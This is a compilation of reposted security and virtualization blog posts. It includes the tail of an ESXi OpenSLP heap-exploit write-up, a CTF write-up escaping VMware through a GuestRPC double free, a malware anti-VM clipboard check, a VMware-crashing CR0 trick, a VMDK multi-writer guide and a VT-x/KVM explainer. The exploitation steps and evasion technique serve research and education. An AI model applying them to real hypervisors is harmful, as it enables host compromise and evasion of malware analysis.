  4. Clients 11–21 sets up the arbitrary read primitive by overwriting client 15’s ‘send-buffer’ position pointers. Since I have no knowledge of what addresses to leak in the first place, I will perform a partial overwrite of the last two significant bytes of the ‘start’ position pointer with null values. This requires setting up the extended free chunk to be marked ‘IS_MAPPED’ to avoid getting zeroed out by the ‘calloc’ call. The ‘send-buffer’ that gets updated belongs to the ‘attribute request’ message. As I have no visibility to how much data will be leaked, I can get a ballpark idea of where the leak is at by including a marker value as part of the ‘service registration’ message noted in step 3. If the leaked content contains the marker, I know it is leaking data from the ‘attribute request’ ‘send-buffer’ object. This tells me it is about time to stop reading from the leak. Lastly, I have to update client 15’s ‘slpd-socket’ to have its state to be in ‘STREAM_WRITE’, which will makes the ‘send’ call to my client.
  5. I was able to collect heap addresses and libc addresses from the leak which I can derive everything else. My goal is to overwrite libc’s __free_hook with libc’s system address. I will need a gadget to position my stack at a location that won’t be subject to alteration by the application. I found a gadget from libc-2.17.so that will stack lift the stack address by 0x100.
  6. With the collected libc address, I can calculate the libc environment address which stores the stack address. I use clients 22–31 to setup the arbitrary read primitive to leak the stack address. I have to update client 25’s file descriptor in the ‘slpd-socket’ to hold the listening file descriptor.
  7. Clients 32–40 sets up the arbitrary write primitive. This requires overwriting client 33’s ‘recv-buffer’ object’s position pointers. It first stores shell commands into client 15’s ‘send-buffer’ object, which is a large slab of space under my control. It then writes the libc’s system address, a fake return address, and the address of the shell command onto the predicted stack location after stack lifting is performed. Afterwards, it overwrites libc’s __free_hook to hold the stack lifting gadget address. Lastly, each arbitrary write requires updating the corresponding ‘slpd-socket’ object state to ‘STREAM_READ’. If this step is skipped, the server will not accept the overwritten values for the position pointers.
  8. The desired shell commands will be executed once all the above steps are completed.

Final Remark

I enjoyed implementing this exploit very much and learned a few things when writing it. One of the biggest thing I learn is never make an assumption and should always test an idea out. When I was trying to get the leaking data part of the exploit code to work, I was preparing to implement it the way Lucas described in his blog, which seems slightly complicated. I was curious as to why I can’t just flip the socket object’s state to ‘STREAM_WRITE’ which send the data back to me. After reviewing the OpenSLP code, I understand the problem and see why Lucas came up with his particular solution. Nevertheless, I still wanted to see what happens if I just flip the state on the socket object, and to my disbelief, the daemon did send me the leaked data immediately without going through the additional hurdles. Another take away is when doing any heap grooming design, it is best to work it backward from how I want the heap to look in its finished form, and back track the layout to the beginning.

The PoC should work out of the box against VMware ESXi 6.7.0 build-14320388, which is the trial version. I was able to get it to work 14 out of 15 tries.

Pwning VMWare, Part 1: RWCTF 2018 Station-Escape

Original text by nafod

Since December rolled around, I have been working on pwnables related to VMware breakouts as part of my advent calendar for 2019. Advent calendars are a fun way to get motivated to get familiar with a target you’re always putting off, and I had a lot of success learning about V8 with my calendar from last year.

To that end, my calendar this year is lighter on challenges than last year. VMware has been part of significantly fewer CTFs than browsers, and the only recent and interesting challenge I noticed was Station-Escape from Real World CTF Finals 2018. To fill out the rest of the calendar, I picked up two additional bugs used at Pwn2Own this year by the talented Fluoroacetate duo. I plan to write an additional blog post about the exploitation of those challenges once complete, with a more broad look at VMware exploitation and attack surface. For now I’ll focus solely on the CTF pwnable and limit my scope to the sections relating to the challenge.

As a final note, I exploited VMware on Ubuntu 18.04 which was the system used by the organizers during RWCTF. On other systems the exploitation could be wildly different and more complicated, due to the change in underlying heap implementation.

The environment (briefly)

I debugged this challenge by using the VMware Workstation bundle inside of another VMware vm. After booting up the victim, I ssh’d into it and then attached to it with gdb in order to debug the vmware-vmx process. The actual guest OS doesn’t matter; in my case, I also used Ubuntu 18.04 simply because I had just downloaded the iso.

Diffing for the bug

The challenge itself is distributed with a vmware bundle file and a specific patched VMX binary. Once we install the bundle and compare the vmware-vmx-patched to the real vmware-vmx in bindiff, we find just a single code block patched, amounting to a few bytes as a bytepatch

bindiff graph comparison

And, in the decompiler, with some comments

v26->state = 1;
v26->virt_time = VmTime_ReadVirtualTime();
sub_1D8D00(0, v5);
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;
v7 = vm_get_user_reg32(3);
v6(v26->field_48, v5, v7 & 0x21);     // guestrpc_close_backdoor
LODWORD(v8) = 0x10000;

Luckily, the changes are very small, and amount to nopping out a struct field and changing the mask of a user controlled flag value.

The change itself is to a function responsible for handling VMware GuestRPC, an interface that allows the guest system to interact with the host via string-based requests, like a command interface. Much has been written about GuestRPC before, but briefly, it provides an ASCII interface to hypervisor internals. Most commands are short strings in the form of setters and getters, like tools.capability.dnd_version 3 or unity.operation.request. Internally, the commands are sent over “channels”, of which there can be 8 at a time per guest. The flow of operations in a single request includes:

0. Open channel
1. Send command length
2. Send command data
3. Receive reply size
4. Receive reply data
5. "Finalize" transfer
6. Close channel

As a final note, guestrpc requests can be sent inside the guest userspace, so bugs in this interface are particularly interesting from an attacker perspective.

The bug

Examining the changes, we find that they’re all in request type 5, corresponding to GUESTRPC_FINALIZE. The user controls the argument which is & 0x21 and passed to guestrpc_close_backdoor.

void __fastcall guestrpc_close_backdoor(__int64 a1, unsigned __int16 a2, char a3)
{
  __int64 v3; // rbx
  void *v4; // rdi

  v3 = a1;
  v4 = *(void **)(a1 + 8);
  if ( a3 & 0x20 )
  {
    free(v4);
  }
  else if ( !(a3 & 0x10) )
  {
    sub_176D90(v3, 0);
    if ( *(_BYTE *)(v3 + 0x20) )
    {
      vmx_log("GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2);
      guestrpc_close_channel(a2);
      *(_BYTE *)(v3 + 32) = 0;
    }
  }
}

Control of a3 allows us to go down the first branch in a previously inaccessible manner, letting us free the buffer at a1+0x8, which corresponds to the buffer used internally to store the reply data passed back to the user. However, this same buffer will also be freed with command type 6, GUESTRPC_CLOSE, resulting in a controlled double free which we can turn into use-after-free. (The other patch nop’d out code responsible for NULLing out the reply buffer, which would have prevented this codepath from being exploited.)

Given that the bug is very similar to a traditional CTF heap pwnable, we can already envision a rough path forward, for which we’ll fill in details shortly:

  • Obtain a leak, ideally of the vmware-vmx binary text section
  • Use tcache to allocate a chunk on top of a function pointer
  • Obtain rip and rdi control and invoke system("/usr/bin/xcalc &")

Heap internals and obtaining a leak

Firstly, it should be stated that the vmx heap appears to have little churn in a mostly idle VM, at least in the heap section used for guestrpc requests. This means that the exploit can relatively reliable even if the VM has been running for a bit or if the user was previously using the system.

In order to obtain a heap leak, we’ll perform the following series of operations

  1. Allocate three channels [A], [B], and [C]
  2. Send the info-set commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
  3. Open channel [B] and issue a info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just
  7. Close channel [B], freeing the buffer again
  8. Read out the reply on channel [C] to leak our data

Each vmware-vmx process has a number of associated threads, including one thread per guest vCPU. This means that the underlying glibc heap has both the tcache mechanism active, as well as several different heap arenas. Although we can avoid mixing up our tcache chunks by pinning our cpu in the guest to a single core, we still cannot directly leak a libc pointer because only the main_arena in the glibc heap resides there. Instead, we can only leak a pointer to our individual thread arena, which is less useful in our case.

[#0] Id 1, Name: "vmware-vmx", stopped, reason: STOPPED
[#1] Id 2, Name: "vmx-vthread-300", stopped, reason: STOPPED
[#2] Id 3, Name: "vmx-vthread-301", stopped, reason: STOPPED
[#3] Id 4, Name: "vmx-mks", stopped, reason: STOPPED
[#4] Id 5, Name: "vmx-svga", stopped, reason: STOPPED
[#5] Id 6, Name: "threaded-ml", stopped, reason: STOPPED
[#6] Id 7, Name: "vmx-vcpu-0", stopped, reason: STOPPED <-- our vCPU thread
[#7] Id 8, Name: "vmx-vcpu-1", stopped, reason: STOPPED
[#8] Id 9, Name: "vmx-vcpu-2", stopped, reason: STOPPED
[#9] Id 10, Name: "vmx-vcpu-3", stopped, reason: STOPPED
[#10] Id 11, Name: "vmx-vthread-353", stopped, reason: STOPPED
. . . .

To get around this, we’ll modify the above flow to spray some other object with a vtable pointer. I came across this writeup by Amat Cama which detailed his exploitation in 2017 using drag-n-drop and copy-paste structures, which are allocated when you send a guestrpc command in the host vCPU heap.

Therefore, I updated the above flow as follows to leak out a vtable/vmware-vmx-bss pointer

  1. Allocate four channels [A], [B], [C], and [D]
  2. Send the info-set commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
  3. Open channel [B] and issue a info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just
  7. Close channel [B], freeing the buffer again
  8. Send vmx.capability.dnd_version on channel [D], which allocates an object with a vtable on top of the chunk referenced by [C]
  9. Read out the reply on channel [C] to leak the vtable pointer

One thing I did notice is that the copy-paste and drag-n-drop structures appear to only allocate their vtable-containing objects once per guest execution lifetime. This could complicate leaking pointers inside VMs where guest tools are installed and actively being used. In a more reliable exploit, we would hope to create a more repeatable arbitrary read and write primtive, maybe with these heap constructions alone. From there, we could trace backwards to leak our vmx binary.

Overwriting a channel structure

Once we have obtained a vtable leak, we can begin looking for interesting structures in the BSS. vmware-vmx has system in its GOT, so we can also jump to the stub as a proxy for system’s address.

I chose to target the underlying channel_t structures which are created when you open a guestrpc channel. vmware-vmx has an array of 8 of these structures (size 0x60) inside its BSS, with each structure containing several buffer pointers, lengths, and function pointers.

Most notably, this structure matches up favorably to our code above in GUESTRPC_FINALIZE

// v6 is read from the channel structure...
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;

// . . . .

// ... and so is the first argument
v6(v26->field_48, v5, v7 & 0x21);     // guestrpc_close_backdoor

To target this, we’ll abuse the tcache mechanism in glibc 2.27, the glibc version in use on the host system. In that version of glibc, tcache was completely unprotected, and by overwriting the first quadword of a freed chunk on a tcache freelist, we can allocate a chunk of that size anywhere in memory by simplying subsequently allocating that size twice. Therefore, we make our exploit land on top of a channel structure, set bogus fields to control the function pointer and argument, and then invoke GUESTRPC_FINALIZE to call system("/usr/bin/xcalc"). The full steps are as follows:

  1. Allocate five channels [A], [B], [C], [D], and [E]
  2. Send the info-set commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap. a. This time, populate the info-set value such that its first 8 bytes are a pointer to the channel_t array in the BSS.
  3. Open channel [B] and issue a info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just
  7. Close channel [B], freeing the buffer again
  8. Invoke info-get on channel [D] to flush one chunk from the tcache list; the next chunk will land on our channel
  9. Send a “command” to [E] consisting of fake chunk data padded to our buggy chunksize. This will land on our channel_t BSS data and give us control over a channel
  10. Invoke GUESTRPC_FINALIZE on our corrupted channel to pop calc

Conclusion

This was definitely a light challenge with which to dip my feet in VMware exploitation. The exploitation itself was pretty vanilla heap, but the overall challenge did involve some RE on the vmware-vmx binary, and required becoming familiar with some of the attack surface exposed to the guest. For a CTF challenge, it hit roughly the appropriate intersection of “real world” and “solvable in 48 hours” that you would expect from a high quality event. You can find my final solution script in my advent-vmpwn github repo.

From here on out, my advent calendar involves 2 CVEs, both of which are in virtual hardware devices implemented by the vmware-vmx binary. Furthermore, neither has a public POC nor details on exploitation, so they should be more interesting to dive in to. So, stay tuned for my next post if you’re interested on digging into the underpinnings of USB 😉

The Weak Bug — Exploiting a Heap Overflow in VMware

Real World CTF 2018 Finals Station-Escape Writeup (challenge files are linked here!)

An anti-sandbox/anti-reversing trick using the GetClipboardOwner API

( Original text by Hexacorn )

This is a little nifty trick for detecting virtualization environments. At least, some of them.

Anytime you restore the snapshot of your virtual machine your guest OS environment will usually run some initialization tasks first. If we talk about VMWare these tasks will be ran by the vmtoolsd.exe process (of course, assuming you have the VMware Tools installed).

Some of the tasks this process performs include clipboard initialization, often placing whatever is in the clipboard on the host inside the clipboard belonging to the guest OS. And this activity is a bad ‘opsec’ of the guest software.

By checking what process recently modified the clipboard we have a good chance of determining that the program is running inside the virtual machine. All you have to do is to call GetClipboardOwner API to determine the window that is the owner of the clipboard at the time of calling, and from there, the process name via e.g. GetWindowThreadProcessId. Yup, it’s that simple. While it may not work all the time, it is just yet another way of testing the environment.

If you want to check how and if it works on your VM snapshots you can use this little program: ClipboardOwnerDebug.exe

This is what I see on my win7 vm snapshot after I revert to its last state and run the ClipboardOwnerDebug.exe program:

Notably, I didn’t drag&drop/copy paste the ClipboardOwnerDebug.exe file to VM, I actually copied it via a network share to ensure my clipboard doesn’t change during this test; and, even if I did just CTRL+C (copy) the file on the host and CTRL+V (paste) it on the guest the result would be very similar anyway. The vmtoolsd.exe process just gets involved all the time.

The malware doesn’t need to rely on the first call to the GetClipboardOwner API. It could stall for a bit observing changes to the clipboard owner windows and testing if at any point there is a reference to a well-known virtualization process. Anytime the context of copying to clipboard changes between the host and the guest OS (very often when you do manual reversing), the clipboard window ownership will change, even if just temporarily.

The below is an example of the clipboard ownership changing during a simple VM session where things are copied to clipboard a few time, both on the host and on the guest and the context of the the clipboard changes. The context switch means that when the guest gets the mouse/keyboard focus, the changes to host clipboard are immediately reflected by the appearance of the vmtoolsd.exe process on the list:

https://github.com/DissectMalware/ClipboardWatcher

VMware virtual disk (VMDK) in Multi Write Mode

( original text by David Pasek )

VMFS is a clustered file system that disables (by default) multiple virtual machines from opening and writing to the same virtual disk (vmdk file). This prevents more than one virtual machine from inadvertently accessing the same vmdk file. This is the safety mechanism to avoid data corruption in cases where the applications in the virtual machine do not maintain consistency in the writes performed to the shared disk. However, you might have some third-party cluster-aware application, where the multi-writer option allows VMFS-backed disks to be shared by multiple virtual machines and leverage third-party OS/App cluster solutions to share a single VMDK disk on VMFS filesystem. These third-party cluster-aware applications, in which the applications ensure that writes originate from multiple different virtual machines, does not cause data loss. Examples of such third-party cluster-aware applications are Oracle RAC, Veritas Cluster Filesystem, etc.Картинки по запросу VMware

There is VMware KB “Enabling or disabling simultaneous write protection provided by VMFS using the multi-writer flag (1034165)” available at https://kb.vmware.com/kb/1034165 KB describes how to enable or disable simultaneous write protection provided by VMFS using the multi-writer flag. It is the official resource how to use multi-write flag but the operational procedure is a little bit obsolete as vSphere 6.x supports configuration from WebClient (Flash) or vSphere Client (HTML5) GUI as highlighted in the screenshot below.

However, KB 1034165 contains several important limitations which should be considered and addressed in solution design. Limitations of multi-writer mode are:

  • The virtual disk must be eager zeroed thick; it cannot be zeroed thick or thin provisioned.
  • Sharing is limited to 8 ESXi/ESX hosts with VMFS-3 (vSphere 4.x) and VMFS-5 (vSphere 5.x) and VMFS-6 in multi-writer mode.
  • Hot adding a virtual disk removes Multi-Writer Flag.

Let’s focus on 8 ESXi host limit. The above statement about scalability is a little bit unclear. That’s the reason why one of my customers has asked me what does it really mean. I did some research on internal VMware resources and fortunately enough I’ve found internal VMware discussion about this topic, so I think sharing the info about this topic will help to broader VMware community.

Here is 8 host limit explanation in other words …

“8 host limit implies how many ESXi hosts can simultaneously open the same virtual disk (aka VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. This limitation applies to a group of VMs sharing the same VMDK file for a particular instance of the cluster-aware application. In case, you need to consolidate multiple application clusters into a single vSphere cluster, you can safely do it and app nodes from one app cluster instance can run on other ESXi nodes than app nodes from another app cluster instance. It means that if you have more than one app cluster instance, all app cluster instances can leverage resources from more than 8 ESXi hosts in vSphere Cluster.”

The best way to fully understand specific behavior is to test it. That’s why I have a pretty decent home lab. However, I do not have 10 physical ESXi host, therefore I have created a nested vSphere environment with vSphere Cluster having 9 ESXi hosts. You can see vSphere cluster with two App Cluster Instances (App1, App2) on the screenshot below.

Application Cluster instance App1 is composed of 9 nodes (9 VMs) and App2 instance just from 2 nodes. Each instance is sharing their own VMDK disk. The whole test infrastructure is conceptually depicted on the figures below.

Test Step 1: I have started 8 of 9 VMs of App1 cluster instance on 8 ESXi hosts (ESXi01-ESXi08). Such setup works perfectly fine as there is 1 to 1 mapping between VMs and ESX hosts within the limit of 8 ESXi hosts having shared VMDK1 opened.

Test Step 2: Next step is to test the Power-On operation of App1-VM9 on ESXi09. Such operation fails. This is expected result because 9th ESXi host cannot open the VMDK1 file on VMFS datastore.

The error message is visible on the screenshot below.

Test Step 3: Next step is to Power On App1-VM9 on ESXi01. This operation is successful as two app cluster nodes (virtual machines App1-VM1 and App1-VM9) are running on single ESXi host (ESX01) therefore only 8 ESXi hosts have the VMDK1 file open and we are in the supported limits.

Test Step 4: Let’s test vMotion of App1-VM9 from ESXi01 to ESX09. Such operation fails. This is expected result because of the same reason as on Power-On operation. App1 Cluster instance would be stretched across 9 ESXi hosts but 9thESXi host cannot open VMDK1 file on VMFS datastore.

The error message is a little bit different but the root cause is the same.

Test Step 5: Let’s test vMotion of App2-VM2 from ESXi08 to ESX09. Such operation works because App2 Cluster instance is still stretched across two ESXi hosts only so it is within supported 8 ESXi hosts limit.

Test step 6: The last test is the vMotion of App2-VM2 from vSphere Cluster (ESXi08) to standalone ESXi host outside of the vSphere cluster (ESX01). Such operation works because App2 Cluster instance is still stretched across two ESXi hosts only so it is within supported 8 ESXi hosts limit. vSphere cluster is not the boundary for multi-write VMDK mode.

FAQ

Q: What exactly does it mean the limitation of 8 ESXi hosts?

A: 8 ESXi host limit implies how many ESXi hosts can simultaneously open the same virtual disk (aka VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. Details and various scenarios are described in this article.

Q: Where are stored the information about the locks from ESXi hosts?

A: The normal VMFS file locking mechanism is in use, therefore there are VMFS file locks which can be displayed by ESXi command: vmkfstools -D

The only difference is that multi-write VMDKs can have multiple locks as is shown in the screenshot below.

Q: Is it supported to use DRS rules for vmdk multi-write in case that is more than 8 ESXi hosts in the cluster where VMs with configured multi-write vmdks are running?

A: Yes. It is supported. DRS rules can be beneficial to keep all nodes of the particular App Cluster Instance on specified ESXi hosts. This is not necessary nor required from the technical point of view, but it can be beneficial from a licensing point of view.

Q: How ESXi life cycle can be handled with the limit 8 ESXi hosts?

A: Let’s discuss specific VM operations and supportability of multi-write vmdk configuration. The source for the answers is VMware KB https://kb.vmware.com/kb/1034165

  • Power on, off, restart virtual machine – supported
  • Suspend VM – unsupported
  • Hot add virtual disks — only to existing adapters
  • Hot remove devices – supported
  • Hot extend virtual disk – unsupported
  • Connect and disconnect devices – supported
  • Snapshots – unsupported
  • Snapshots of VMs with independent-persistent disks – supported
  • Cloning – unsupported
  • Storage vMotion – unsupported
  • Changed Block Tracking (CBT) – unsupported
  • vSphere Flash Read Cache (vFRC) – unsupported
  • vMotion – supported by VMware for Oracle RAC only and limited to 8 ESX/ESXi hosts. Note: other cluster-aware applications are not supported by VMware but can be supported by partners. For example, Veritas products have supportability documented here https://sort.veritas.com/public/documents/sfha/6.2/vmwareesx/productguides/html/sfhas_virtualization/ch01s05s01.htm Please, verify current supportability directly with specific partners.

Q: Is it possible to migrate VMs with multi-write vmdks to different cluster when it will be offline?

A: Yes. VM can be Shut Down or Power Off and Power On on any ESXi host outside of the vSphere cluster. The only requirement is to have the same VMFS datastore available on source and target ESXi host. Please, keep in mind that the maximum supported number of ESXi hosts connected to a single VMFS datastore is 64.

 

Control Register Access Exiting and Crashing VMware

( origin text  from https://howtohypervise.blogspot.com )

Coinciding with my previous two posts, here’s how you can crash or at least detect VMware and many other hypervisors:
https://gist.github.com/drew1ind/d31840bebbbb1ff1d112a6f46e162c05Backstory:
When I was writing a simple SEH emulator (following the documentation on msdn as well as this excellent blogpost) for my hypervisor, I was testing under VMware.

When trying to execute that, I found that VMware would instantly close without any message. After being stumped for a while, I tried on my PC only to find that my SEH emulator did, in fact, work.
When I talked about it with my friend daax (whose blog can be found over at https://revers.engineering/), he recalled experiencing the exact same issue (albeit with different motivations): when he tried to unset CR0.pe to cause a #GP(0), VMware would just close on him. This eventually drove me to the conclusion that VMware was improperly handling the CR access VM exit for CR0, or more specifically, they don’t check that cr0.pg is already enabled, which would normally cause a #GP(0). Since they write the invalid value into the guest CR0 VMCS field, the processor objects upon VM entry in the form of a VM entry failure, which VMware responds to by just closing itself.
Additional checks in that gist linked above rely on hypervisors not properly emulating CPU behaviour, which includes:
  • Injecting an exception upon updating bits of CR0 required to be a certain value by the CPU for VMX operation or just not updating them at all
  • Not injecting a fault when the guest attempts to set a reserved bit of CR0, which can result in either VM entry failure or a triple fault due to repeated #GP(0)s
  • Updating the state of CR0 even though the write caused a #GP(0)
Fixes for such include:
  • Always checking if a change is valid before changing any CPU state
  • For control register bits that are documented, if they are changed, the hypervisor should ensure that the processor supports the bit and if the processor would inject an exception if the bit was changed (i.e with the VMware example, they should check if CR0.pg is set, and if it is, declare the change as invalid)
  • Control register bits that are forced to be a fixed value should be host owned bits which values only change in the read shadow
  • Control register bits which don’t exist at the time of writing the hypervisor should never be allowed to change — this also means that the hypervisor *must* control CPUID responses to remove reserved bits from responses, as well as reserved leafs

Intel Virtualisation: How VT-x, KVM and QEMU Work Together

VT-x is name of CPU virtualisation technology by Intel. KVM is component of Linux kernel which makes use of VT-x. And QEMU is a user-space application which allows users to create virtual machines. QEMU makes use of KVM to achieve efficient virtualisation. In this article we will talk about how these three technologies work together. Don’t expect an in-depth exposition about all aspects here, although in future, I might follow this up with more focused posts about some specific parts.

Something About Virtualisation First

Let’s first touch upon some theory before going into main discussion. Related to virtualisation is concept of emulation – in simple words, faking the hardware. When you use QEMU or VMWare to create a virtual machine that has ARM processor, but your host machine has an x86 processor, then QEMU or VMWare would emulate or fake ARM processor. When we talk about virtualisation we mean hardware assisted virtualisation where the VM’s processor matches host computer’s processor. Often conflated with virtualisation is an even more distinct concept of containerisation. Containerisation is mostly a software concept and it builds on top of operating system abstractions like process identifiers, file system and memory consumption limits. In this post we won’t discuss containers any more.

A typical VM set up looks like below:

vm-arch

 

At the lowest level is hardware which supports virtualisation. Above it, hypervisor or virtual machine monitor (VMM). In case of KVM, this is actually Linux kernel which has KVM modules loaded into it. In other words, KVM is a set of kernel modules that when loaded into Linux kernel turn the kernel into hypervisor. Above the hypervisor, and in user space, sit virtualisation applications that end users directly interact with – QEMU, VMWare etc. These applications then create virtual machines which run their own operating systems, with cooperation from hypervisor.

Finally, there is “full” vs. “para” virtualisation dichotomy. Full virtualisation is when OS that is running inside a VM is exactly the same as would be running on real hardware. Paravirtualisation is when OS inside VM is aware that it is being virtualised and thus runs in a slightly modified way than it would on real hardware.

VT-x

VT-x is CPU virtualisation for Intel 64 and IA-32 architecture. For Intel’s Itanium, there is VT-I. For I/O virtualisation there is VT-d. AMD also has its virtualisation technology called AMD-V. We will only concern ourselves with VT-x.

Under VT-x a CPU operates in one of two modes: root and non-root. These modes are orthogonal to real, protected, long etc, and also orthogonal to privilege rings (0-3). They form a new “plane” so to speak. Hypervisor runs in root mode and VMs run in non-root mode. When in non-root mode, CPU-bound code mostly executes in the same way as it would if running in root mode, which means that VM’s CPU-bound operations run mostly at native speed. However, it doesn’t have full freedom.

Privileged instructions form a subset of all available instructions on a CPU. These are instructions that can only be executed if the CPU is in higher privileged state, e.g. current privilege level (CPL) 0 (where CPL 3 is least privileged). A subset of these privileged instructions are what we can call “global state-changing” instructions – those which affect the overall state of CPU. Examples are those instructions which modify clock or interrupt registers, or write to control registers in a way that will change the operation of root mode. This smaller subset of sensitive instructions are what the non-root mode can’t execute.

VMX and VMCS

Virtual Machine Extensions (VMX) are instructions that were added to facilitate VT-x. Let’s look at some of them to gain a better understanding of how VT-x works.

VMXON: Before this instruction is executed, there is no concept of root vs non-root modes. The CPU operates as if there was no virtualisation. VMXON must be executed in order to enter virtualisation. Immediately after VMXON, the CPU is in root mode.

VMXOFF: Converse of VMXON, VMXOFF exits virtualisation.

VMLAUNCH: Creates an instance of a VM and enters non-root mode. We will explain what we mean by “instance of VM” in a short while, when covering VMCS. For now think of it as a particular VM created inside QEMU or VMWare.

VMRESUME: Enters non-root mode for an existing VM instance.

When a VM attempts to execute an instruction that is prohibited in non-root mode, CPU immediately switches to root mode in a trap-like way. This is called a VM exit.

Let’s synthesise the above information. CPU starts in a normal mode, executes VMXON to start virtualisation in root mode, executes VMLAUNCH to create and enter non-root mode for a VM instance, VM instance runs its own code as if running natively until it attempts something that is prohibited, that causes a VM exit and a switch to root mode. Recall that the software running in root mode is hypervisor. Hypervisor takes action to deal with the reason for VM exit and then executes VMRESUME to re-enter non-root mode for that VM instance, which lets the VM instance resume its operation. This interaction between root and non-root mode is the essence of hardware virtualisation support.

Of course the above description leaves some gaps. For example, how does hypervisor know why VM exit happened? And what makes one VM instance different from another? This is where VMCS comes in. VMCS stands for Virtual Machine Control Structure. It is basically a 4KiB part of physical memory which contains information needed for the above process to work. This information includes reasons for VM exit as well as information unique to each VM instance so that when CPU is in non-root mode, it is the VMCS which determines which instance of VM it is running.

As you may know, in QEMU or VMWare, we can decide how many CPUs a particular VM will have. Each such CPU is called a virtual CPU or vCPU. For each vCPU there is one VMCS. This means that VMCS stores information on CPU-level granularity and not VM level. To read and write a particular VMCS, VMREAD and VMWRITE instructions are used. They effectively require root mode so only hypervisor can modify VMCS. Non-root VM can perform VMWRITE but not to the actual VMCS, but a “shadow” VMCS – something that doesn’t concern us immediately.

There are also instructions that operate on whole VMCS instances rather than individual VMCSs. These are used when switching between vCPUs, where a vCPU could belong to any VM instance. VMPTRLD is used to load the address of a VMCS and VMPTRST is used to store this address to a specified memory address. There can be many VMCS instances but only one is marked as current and active at any point. VMPTRLD marks a particular VMCS as active. Then, when VMRESUME is executed, the non-root mode VM uses that active VMCS instance to know which particular VM and vCPU it is executing as.

Here it’s worth noting that all the VMX instructions above require CPL level 0, so they can only be executed from inside the Linux kernel (or other OS kernel).

VMCS basically stores two types of information:

  1. Context info which contains things like CPU register values to save and restore during transitions between root and non-root.
  2. Control info which determines behaviour of the VM inside non-root mode.

More specifically, VMCS is divided into six parts.

  1. Guest-state stores vCPU state on VM exit. On VMRESUME, vCPU state is restored from here.
  2. Host-state stores host CPU state on VMLAUNCH and VMRESUME. On VM exit, host CPU state is restored from here.
  3. VM execution control fields determine the behaviour of VM in non-root mode. For example hypervisor can set a bit in a VM execution control field such that whenever VM attempts to execute RDTSC instruction to read timestamp counter, the VM exits back to hypervisor.
  4. VM exit control fields determine the behaviour of VM exits. For example, when a bit in VM exit control part is set then debug register DR7 is saved whenever there is a VM exit.
  5. VM entry control fields determine the behaviour of VM entries. This is counterpart of VM exit control fields. A symmetric example is that setting a bit inside this field will cause the VM to always load DR7 debug register on VM entry.
  6. VM exit information fields tell hypervisor why the exit happened and provide additional information.

There are other aspects of hardware virtualisation support that we will conveniently gloss over in this post. Virtual to physical address conversion inside VM is done using a VT-x feature called Extended Page Tables (EPT). Translation Lookaside Buffer (TLB) is used to cache virtual to physical mappings in order to save page table lookups. TLB semantics also change to accommodate virtual machines. Advanced Programmable Interrupt Controller (APIC) on a real machine is responsible for managing interrupts. In VM this too is virtualised and there are virtual interrupts which can be controlled by one of the control fields in VMCS. I/O is a major part of any machine’s operations. Virtualising I/O is not covered by VT-x and is usually emulated in user space or accelerated by VT-d.

KVM

Kernel-based Virtual Machine (KVM) is a set of Linux kernel modules that when loaded, turn Linux kernel into hypervisor. Linux continues its normal operations as OS but also provides hypervisor facilities to user space. KVM modules can be grouped into two types: core module and machine specific modules. kvm.ko is the core module which is always needed. Depending on the host machine CPU, a machine specific module, like kvm-intel.ko or kvm-amd.ko will be needed. As you can guess, kvm-intel.ko uses the functionality we described above in VT-x section. It is KVM which executes VMLAUNCH/VMRESUME, sets up VMCS, deals with VM exits etc. Let’s also mention that AMD’s virtualisation technology AMD-V also has its own instructions and they are called Secure Virtual Machine (SVM). Under `arch/x86/kvm/` you will find files named `svm.c` and `vmx.c`. These contain code which deals with virtualisation facilities of AMD and Intel respectively.

KVM interacts with user space – in our case QEMU – in two ways: through device file `/dev/kvm` and through memory mapped pages. Memory mapped pages are used for bulk transfer of data between QEMU and KVM. More specifically, there are two memory mapped pages per vCPU and they are used for high volume data transfer between QEMU and the VM in kernel.

`/dev/kvm` is the main API exposed by KVM. It supports a set of `ioctl`s which allow QEMU to manage VMs and interact with them. The lowest unit of virtualisation in KVM is a vCPU. Everything builds on top of it. The `/dev/kvm` API is a three-level hierarchy.

  1. System Level: Calls this API manipulate the global state of the whole KVM subsystem. This, among other things, is used to create VMs.
  2. VM Level: Calls to this API deal with a specific VM. vCPUs are created through calls to this API.
  3. vCPU Level: This is lowest granularity API and deals with a specific vCPU. Since QEMU dedicates one thread to each vCPU (see QEMU section below), calls to this API are done in the same thread that was used to create the vCPU.

After creating vCPU QEMU continues interacting with it using the ioctls and memory mapped pages.

QEMU

Quick Emulator (QEMU) is the only user space component we are considering in our VT-x/KVM/QEMU stack. With QEMU one can run a virtual machine with ARM or MIPS core but run on an Intel host. How is this possible? Basically QEMU has two modes: emulator and virtualiser. As an emulator, it can fake the hardware. So it can make itself look like a MIPS machine to the software running inside its VM. It does that through binary translation. QEMU comes with Tiny Code Generator (TCG). This can be thought if as a sort of high-level language VM, like JVM. It takes for instance, MIPS code, converts it to an intermediate bytecode which then gets executed on the host hardware.

The other mode of QEMU – as a virtualiser – is what achieves the type of virtualisation that we are discussing here. As virtualiser it gets help from KVM. It talks to KVM using ioctl’s as described above.

